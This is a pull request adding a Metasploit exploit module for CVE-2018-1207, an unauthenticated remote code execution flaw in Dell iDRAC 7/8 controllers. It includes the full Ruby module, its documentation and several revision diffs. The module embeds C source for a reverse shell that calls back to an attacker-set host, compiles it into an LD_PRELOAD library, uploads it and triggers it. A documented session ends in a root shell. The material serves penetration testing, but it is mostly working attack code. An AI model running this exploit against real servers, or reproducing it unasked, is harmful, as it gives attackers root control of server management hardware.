### PR TITLE
Add Dell iDRAC 7/8 RCE (CVE-2018-1207)

### DIFF
--- a/documentation/modules/exploit/linux/http/dell_idrac_upload_exec.md
+++ b/documentation/modules/exploit/linux/http/dell_idrac_upload_exec.md
@@ -1,0 +1,85 @@
+## Description  
+
+Dell IDRAC servers prior to firmware version 2.52.52.52 are vulnerable to an unauthenticated remote code execution vulnerability, CVE-2018-1207. This exploit makes use of CGI environment variables to upload a reverse shell and hook LD_PRELOAD to obtain a connection. This process has the potential to fork bomb the system, so this module safely unsets the LD_PRELOAD variable on connection to the reverse shell. The servers run on the SH4 architecture, which requires cross-compiling with the gcc-8-sh4-linux-gnu package. Only a reverse shell is supported at this time.
+
+## Vulnerable Application  
+
+Dell IDRAC 7/8
+
+
+## Vulnerable Application Installation Setup.
+
+Generation 12 and 13 Dell PowerEdge servers are vulnerable. 
+
+https://en.wikipedia.org/wiki/List_of_Dell_PowerEdge_Servers
+
+## Verification Steps  
+
+  1. Identify an IDRAC 7 or 8 appliance
+  2. Start msfconsole
+  3. Do: ```use exploit/linux/http/dell_idrac_upload_exec```
+  4. Do: ``set rhost <ip>``
+  5. Do: ``set rport <80/443>``
+  6. Do: ``check``
+
+``[*] 192.168.0.10 The target is vulnerable.``
+
+  7. Do: ``set lhost <ip>``
+  8. Do: ``set lport <port>``
+  9. Do: ``exploit``
+  10. You should get a shell.
+
+## Scenarios  
+
+TESTED AGAINST LINUX
+
+```
+msf5 > use exploit/linux/http/dell_idrac_upload_exec
+msf5 exploit(linux/http/dell_idrac_upload_exec) > options 
+
+Module options (exploit/linux/http/dell_idrac_upload_exec):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT    80               yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   TIMEOUT  15               no        Override default timeout for reqeusts
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (generic/shell_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Auto
+
+
+msf5 exploit(linux/http/dell_idrac_upload_exec) > set rhost 192.168.0.10
+rhost => 192.168.0.10
+msf5 exploit(linux/http/dell_idrac_upload_exec) > check
+[*] Sending request to http://192.168.0.10/cgi-bin/login?LD_DEBUG=files
+[*] Valid response received...
+[+] 192.168.0.10:80 The target is vulnerable.
+msf5 exploit(linux/http/dell_idrac_upload_exec) > set lhost 192.168.0.5
+lhost => 192.168.0.5
+msf5 exploit(linux/http/dell_idrac_upload_exec) > exploit 
+[*] Started reverse TCP handler on 192.168.0.5:4444
+[*] Sending request to http://192.168.0.10/cgi-bin/login?LD_DEBUG=files
+[*] Valid response received...
+[*] Sending request for http://192.168.0.10/cgi-bin/putfile
+[*] 192.168.0.10 - Exploit Upload Success
+[*] Command shell session 1 opened (192.168.0.5:4444 -> 192.168.0.10:45038) at 2020-02-26 12:51:27 -0600
+
+id
+uid=0(root) gid=0(root)
+```

--- a/documentation/modules/exploit/linux/http/dell_idrac_upload_exec.md
+++ b/documentation/modules/exploit/linux/http/dell_idrac_upload_exec.md
@@ -18,16 +18,15 @@ https://en.wikipedia.org/wiki/List_of_Dell_PowerEdge_Servers
   1. Identify an IDRAC 7 or 8 appliance
   2. Start msfconsole
   3. Do: ```use exploit/linux/http/dell_idrac_upload_exec```
-  4. Do: ``set rhost <ip>``
+  4. Do: ``set rhosts <ip>``
   5. Do: ``set rport <80/443>``
-  6. Do: ``check``
 
 ``[*] 192.168.0.10 The target is vulnerable.``
 
-  7. Do: ``set lhost <ip>``
-  8. Do: ``set lport <port>``
-  9. Do: ``exploit``
-  10. You should get a shell.
+  6. Do: ``set lhost <ip>``
+  7. Do: ``set lport <port>``
+  8. Do: ``exploit``
+  9. You should get a shell.
 
 ## Scenarios  
 
@@ -64,7 +63,7 @@ Exploit target:
    0   Auto
 
 
-msf5 exploit(linux/http/dell_idrac_upload_exec) > set rhost 192.168.0.10
+msf5 exploit(linux/http/dell_idrac_upload_exec) > set rhosts 192.168.0.10
 rhost => 192.168.0.10
 msf5 exploit(linux/http/dell_idrac_upload_exec) > check
 [*] Sending request to http://192.168.0.10/cgi-bin/login?LD_DEBUG=files

--- a/modules/exploits/linux/http/dell_idrac_upload_exec.rb
+++ b/modules/exploits/linux/http/dell_idrac_upload_exec.rb
@@ -30,6 +30,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'References' =>
         [
           ['URL', 'https://github.com/KraudSecurity/Exploits/blob/master/CVE-2018-1207/CVE-2018-1207.py'],
+          ['URL', 'https://www.immunityinc.com/downloads/The-Unbearable-Lightness-of-BMC-wp.pdf'],
           ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1207'],
           ['CVE', '2018-1207']
         ],
@@ -128,21 +129,16 @@ class MetasploitModule < Msf::Exploit::Remote
       print_warning 'Target does not appear to be vulnerable'
     end
 
-    lport = datastore['LPORT'] || 80
-    lhost = datastore['LHOST'] || '0.0.0.0'
-
     # Write payload to temp file
     temp_file = Rex::Quickfile.new(['', '.c'])
-    write_payload(temp_file, lhost, lport)
+    write_payload(temp_file, datastore['LHOST'], datastore['LPORT'])
     temp_file.close
 
     # Compile payload to temp library
     payload_file = Rex::Quickfile.new(['', '.so'])
     compile(temp_file.path, payload_file.path)
 
-    f = File.open(payload_file.path, 'rb')
-    payload_so = f.read
-    f.close
+    payload_so = File.read payload_file.path
 
     f_alias = 'RACPKSSHAUTHKEY1'
     payload = f_alias + ['00' * (32 - f_alias.size)].pack('h*')

--- a/modules/exploits/linux/http/dell_idrac_upload_exec.rb
+++ b/modules/exploits/linux/http/dell_idrac_upload_exec.rb
@@ -31,7 +31,7 @@ class MetasploitModule < Msf::Exploit::Remote
         [
           ['URL', 'https://github.com/KraudSecurity/Exploits/blob/master/CVE-2018-1207/CVE-2018-1207.py'],
           ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1207'],
-          "CVE-2018-1207"
+          ['CVE', '2018-1207']
         ],
       'DefaultTarget' => 0))
     register_options [

--- a/modules/exploits/linux/http/dell_idrac_upload_exec.rb
+++ b/modules/exploits/linux/http/dell_idrac_upload_exec.rb
@@ -122,11 +122,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    unless check
-      unless datastore['ForceExploit']
-        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
-      end
-      print_warning 'Target does not appear to be vulnerable'
+    unless check == CheckCode::Vulnerable || datastore['ForceExploit']
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
     end
 
     # Write payload to temp file

--- a/modules/exploits/linux/http/dell_idrac_upload_exec.rb
+++ b/modules/exploits/linux/http/dell_idrac_upload_exec.rb
@@ -1,0 +1,192 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'Dell iDRAC 7/8 Devices Code Injection Vulnerability (RCE)',
+      'Description' => %q(
+        CVE-2018-1207. Vulnerable version firmware: <  2.52.52.52. Unauthenticated remote code execution
+        against Dell iDRAC 7 and 8, which runs as root.
+      ),
+      'License' => MSF_LICENSE,
+      'Author' =>
+        [
+          'Wyatt Dahlenburg (@wdahlenb)',
+          'Starev Alexey ( https://t.me/starev_aa ), http://kraud.ru'
+        ],
+      'DisclosureDate' => '2018-09-06',
+      'Platform' => 'linux',
+      'DefaultOptions' => { 'Payload' => 'generic/shell_reverse_tcp' },
+      'SessionTypes' => [ 'shell' ],
+      'Targets' => [['Auto', {}]],
+      'References' =>
+        [
+          ['URL', 'https://github.com/KraudSecurity/Exploits/blob/master/CVE-2018-1207/CVE-2018-1207.py'],
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1207'],
+          "CVE-2018-1207"
+        ],
+      'DefaultTarget' => 0))
+    register_options [
+      OptInt.new("TIMEOUT", [false, 'Override default timeout for reqeusts', 15]),
+    ]
+    register_advanced_options [
+      OptBool.new('ForceExploit', [false, 'Override check result', false]),
+    ]
+  end
+
+  def write_payload(file, lhost, lport)
+    vprint_status "Writing #{file.path}"
+    data = <<~EOF
+      #include <stdlib.h>
+      #include <unistd.h>
+      #include <sys/socket.h>
+      #include <netinet/in.h>
+      #include <arpa/inet.h>
+      #include <unistd.h>
+      static void main(void) __attribute__((constructor));
+      static void main(void)
+      {
+        int pid = fork();
+        if(!pid) {
+          int sock = socket(AF_INET, SOCK_STREAM, 0);
+          struct sockaddr_in serv_addr = {0};
+          serv_addr.sin_family = AF_INET;
+          serv_addr.sin_port = htons(#{lport});
+          serv_addr.sin_addr.s_addr = inet_addr("#{lhost}");
+          connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr));
+          dup2(sock, 0);
+          dup2(sock, 1);
+          dup2(sock, 2);
+          execl("/bin/sh", "/bin/sh", NULL);
+        }
+      }
+    EOF
+    file.puts data
+  end
+
+  def compile(source_path, payload_path, gcc_args = '')
+    gcc_cmd = "sh4-linux-gnu-gcc-8 -shared -fPIC #{source_path} -o #{payload_path}"
+
+    unless gcc_args.to_s.blank?
+      gcc_cmd << " #{gcc_args}"
+    end
+
+    if `dpkg --get-selections | grep ^gcc-8-sh4-linux-gnu`.blank?
+      fail_with Failure::BadConfig, 'gcc-8-sh4-linux-gnu is not installed. Unable to compile.'
+    end
+
+    output = `#{gcc_cmd}`
+
+    if output.blank?
+      vprint_status "Compiled #{payload_path}"
+    else
+      vprint_status output
+    end
+
+  end
+
+  def check
+    uri = '/cgi-bin/login'
+    print_status("Sending request to https://#{rhost}#{uri}")
+    res = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => uri,
+        'vars_get' => {
+          'LD_DEBUG' => 'files'
+        }
+      },
+      datastore['TIMEOUT']
+    )
+
+    if res && res.body.to_s =~ /calling init:/
+      print_status('Valid response received...')
+      return CheckCode::Vulnerable
+    elsif res && res.code != 200
+      return CheckCode::Safe
+    elsif res
+      print_error("Unexpected reply from the target: #{res.code} #{res.message} #{res.body}")
+    else
+      print_error('No reply received from the target')
+    end
+    return CheckCode::Unknown
+  end
+
+  def exploit
+    unless check
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    lport = datastore['LPORT'] || 80
+    lhost = datastore['LHOST'] || '0.0.0.0'
+
+    # Write payload to temp file
+    temp_file = Rex::Quickfile.new(['', '.c'])
+    write_payload(temp_file, lhost, lport)
+    temp_file.close
+
+    # Compile payload to temp library
+    payload_file = Rex::Quickfile.new(['', '.so'])
+    compile(temp_file.path, payload_file.path)
+
+    f = File.open(payload_file.path, 'rb')
+    payload_so = f.read
+    f.close
+
+    f_alias = 'RACPKSSHAUTHKEY1'
+    payload = f_alias + ['00' * (32 - f_alias.size)].pack('h*')
+    payload += [payload_so.size].pack('V*')
+    vprint_status "Length of payload is #{payload_so.size}"
+    payload += ['1'].pack('h8')
+    payload += payload_so
+
+    # Upload payload
+    uri = '/cgi-bin/putfile'
+    print_status("Sending request for https://#{rhost}#{uri}")
+    res = send_request_raw(
+      {
+        'method' => 'POST',
+        'uri' => uri,
+        'data' => payload
+      },
+      datastore['TIMEOUT']
+    )
+
+    if res && res.code == 200
+      print_status "#{rhost} - Exploit Upload Success"
+
+      send_request_cgi(
+        {
+          'method' => 'GET',
+          'uri' => '/cgi-bin/discover',
+          'vars_get' => {
+            'LD_PRELOAD' => '/tmp/sshpkauthupload.tmp'
+          }
+        },
+        datastore['TIMEOUT']
+      )
+      vprint_status "#{rhost} - Triggering reverse shell"
+    else
+      print_error "#{rhost} - Error Upload Failed"
+    end
+
+    handler
+  end
+
+  def on_new_session(session)
+    # Remove /tmp/sshpkauthupload.tmp and make sure LD_PRELOAD is unset
+    session.shell_command_token 'rm -f /tmp/sshpkauthupload.tmp'
+    session.shell_command_token 'unset LD_PRELOAD'
+  end
+end

--- a/modules/exploits/linux/http/dell_idrac_upload_exec.rb
+++ b/modules/exploits/linux/http/dell_idrac_upload_exec.rb
@@ -36,7 +36,8 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'DefaultTarget' => 0))
     register_options [
-      OptInt.new("TIMEOUT", [false, 'Override default timeout for reqeusts', 15]),
+      OptString.new('TARGETURI', [true, "The base path to the Dell iDRAC login page", '/']),
+      OptInt.new("TIMEOUT", [false, 'Override default timeout for requests', 15])
     ]
     register_advanced_options [
       OptBool.new('ForceExploit', [false, 'Override check result', false]),
@@ -100,7 +101,7 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi(
       {
         'method' => 'GET',
-        'uri' => uri,
+        'uri' => normalize_uri(target_uri.path, uri),
         'vars_get' => {
           'LD_DEBUG' => 'files'
         }
@@ -153,7 +154,7 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_raw(
       {
         'method' => 'POST',
-        'uri' => uri,
+        'uri' => normalize_uri(target_uri.path, uri),
         'data' => payload
       },
       datastore['TIMEOUT']
@@ -162,10 +163,11 @@ class MetasploitModule < Msf::Exploit::Remote
     if res && res.code == 200
       print_status "#{rhost} - Exploit Upload Success"
 
+      uri = '/cgi-bin/discover'
       send_request_cgi(
         {
           'method' => 'GET',
-          'uri' => '/cgi-bin/discover',
+          'uri' => normalize_uri(target_uri.path, uri),
           'vars_get' => {
             'LD_PRELOAD' => '/tmp/sshpkauthupload.tmp'
           }

--- a/modules/exploits/linux/http/dell_idrac_upload_exec.rb
+++ b/modules/exploits/linux/http/dell_idrac_upload_exec.rb
@@ -176,7 +176,6 @@ class MetasploitModule < Msf::Exploit::Remote
       print_error "#{rhost} - Error Upload Failed"
     end
 
-    handler
   end
 
   def on_new_session(session)


### PR DESCRIPTION
This exploit is a port to ruby of CVE-2018-1207 from https://github.com/KraudSecurity/Exploits/blob/master/CVE-2018-1207/CVE-2018-1207.py. Some cleanup was added to ensure the payload is not left on the host and that the exploit stops forking. 

This exploit is targeting Dell IDRAC 7/8 hosts. A Dell PowerEdge generation 12 or 13 server will be needed to test this. The IDRACs run on the SH4 architecture, so the payload needs to be cross-compiled.  


## Verification

List the steps needed to make sure this thing works
- [ ] Install an sh4 cross compiler `sudo apt install gcc-8-sh4-linux-gnu`
- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/dell_idrac_upload_exec`
- [ ]  `set rhost 192.168.0.10`
- [ ] `check`
- [ ] `set lhost 192.168.0.5`
- [ ] `exploit`
- [ ] **Verify** a vulnerable host returns a reverse shell to lhost:lport
- [ ] **Verify** the webserver on the host is still responsive after exploiting. If the on_new_session function does not run, the payload will continue to fork.



